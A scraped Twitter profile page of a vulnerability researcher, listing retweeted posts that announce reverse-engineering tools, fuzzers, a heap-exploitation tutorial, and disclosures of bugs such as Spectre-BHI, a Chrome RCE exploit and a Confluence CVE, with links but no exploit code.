JohnE Pwny (@erez_yonatan) 's Twitter Profile
JohnE Pwny

@erez_yonatan

Researcher && Internals lover | Pwn | Exploits | Python internals | Embedded | Windows tricks | 61st place on pwnable.kr | Co-author of NoxCTF

ID: 888827442093314049

https://github.com/YonatanErez | Joined: 22-07-2017 18:25:50

182 Tweets

211 Followers

501 Following

Zion Leonahenahe Basque (@mahal0z) 's Twitter Profile Photo

Hope everyone has had a nice holiday season. Decomp2GEF V1.1.0 is out! Convenience Variable Stack Vars support (Wil Gibbs), Native Global Var Symbols support, Configurable connections, and a sick refactor. Demo: youtube.com/watch?v=NSNg0J…. Next on the block: Binja Support.

Tobias Scharnowski (@scepticctf) 's Twitter Profile Photo

We did it, Fuzzware is finally open source! Find the code here: github.com/fuzzware-fuzze… And our experiments here: github.com/fuzzware-fuzze… Feel free to try it out. Let me know if you have any comments/suggestions about the project, or questions about the setup.

kylebot (@ky1ebot) 's Twitter Profile Photo

Thanks to itszn , now you can click a play button in the #how2heap main page and start learning various heap exploitation techniques! Want to learn heap in newer libc? No problem. Just select it in the panel on the left!

Zion Leonahenahe Basque (@mahal0z) 's Twitter Profile Photo

Love using Binary Ninja but also looking for a way to use your reversing work in GDB? Decomp2GEF V1.2.0: Binary Ninja Support is out! Sync reversed symbols from Binja to GDB natively on-the-fly! 1.5 Min Demo: youtu.be/EXObuKNPyaQ. Code link in the thread.

VUSec (@vu5ec) 's Twitter Profile Photo

Spectre-v2 is back! Disclosing Branch History Injection (#BHI/#Spectre-BHB), bypassing Spectre-v2 hw defenses to leak arbitrary kernel/host memory (e.g., root password hash below). Joint work by @Enrico barberis Pietro Frigo nSinus-R (@[email protected]) Herbert Bos Cristiano Giuffrida: vusec.net/projects/bhi-s…

Orange Tsai  🍊 (@orange_8361) 's Twitter Profile Photo

Unsafe .Net Deserialization in Windows Event Viewer! This is a by-product of my research. Has confirmed with MSRC that this didn't cross any security boundary, but I guess it could still be another fun #LOLbas or Defender Bypass.😆

Forrest Orr (@_forrestorr) 's Twitter Profile Photo

I'm proud to release my first Google Chrome RCE derived from the most fascinating and mind bending exploit I have yet analyzed: CVE-2019-13720 Wizard Opium. This is a beautiful bug which I have crafted into an exploit bypassing ASLR, CFG and CET on Win10 github.com/forrest-orr/Wi…

siri@fu4k1 (@sirifu4k1) 's Twitter Profile Photo

CVE-2022-26134 Vulnerability analysis - Critical severity unauthenticated remote code execution vulnerability in Confluence Server and Data Center #CVE #POC #confluence secpulse.com/archives/18183…

Taszk Security Labs (@taszkseclabs) 's Twitter Profile Photo

Log4Harmony: we've heard that vulns in Android log device drivers are cool, so here are some UAF, race condition, and KASLR leak bugs in Huawei's hwlog from Gyorgy Miru (Gym), reachable from an untrusted and isolated app: labs.taszk.io/blog/post/78_h… labs.taszk.io/blog/post/77_h… labs.taszk.io/blog/post/79_h…

Hex-Rays SA (@hexrayssa) 's Twitter Profile Photo

Working on a huge function and the pseudocode listing is too long? Learn how to hide away parts you've already analyzed and not spend time reading it again. hex-rays.com/blog/igors-tip… #IgorsTipOfTheWeek #IDAtips #IDAPro #HexraysDecompiler

Orange Tsai  🍊 (@orange_8361) 's Twitter Profile Photo

My favorite bug among the vulnerabilities I presented today! 😆 The original intent was to compare the password. However, the developer copy-and-pasted the code but forgot to replace the variable name. That leads to the Authentication Bypass on IIS.

Xeno Kovah (@xenokovah) 's Twitter Profile Photo

🎶I’m BACK in the saddle again!🎶 🐎🤠 Time to get started on #OST2 Vulnerabilities 1002! (Provisionally covering uninitialized data access, race conditions, UAF, type confusion, and info leak (as caused by all the past vuln types.)

Ivan Kwiatkowski (@justicerage) 's Twitter Profile Photo

I wrote an IDA plugin that queries #ChatGPT and explains decompiled functions. It's still very bleeding edge, but you can find the code here and try it out: github.com/JusticeRage/Ge… (Yes, the video was performed on a very basic case for simplicity's sake.)

Jonathan Jacobi (@j0nathanj) 's Twitter Profile Photo

I decided to analyze a VirtualBox VM Escape Vulnerability I found a few years ago - and walk through my younger self's research process! Interesting insights and a cute bug! :) j0nathanj.github.io/Dusting-off-th…

Jonathan Jacobi (@j0nathanj) 's Twitter Profile Photo

Introducing Multiverse: the first AI-generated multiplayer game. Multiplayer was the missing piece in AI-generated worlds — now it’s here. Players can interact and shape a shared AI-simulated world, in real-time. Training and research cost < $1.5K. Run it on your own PC. We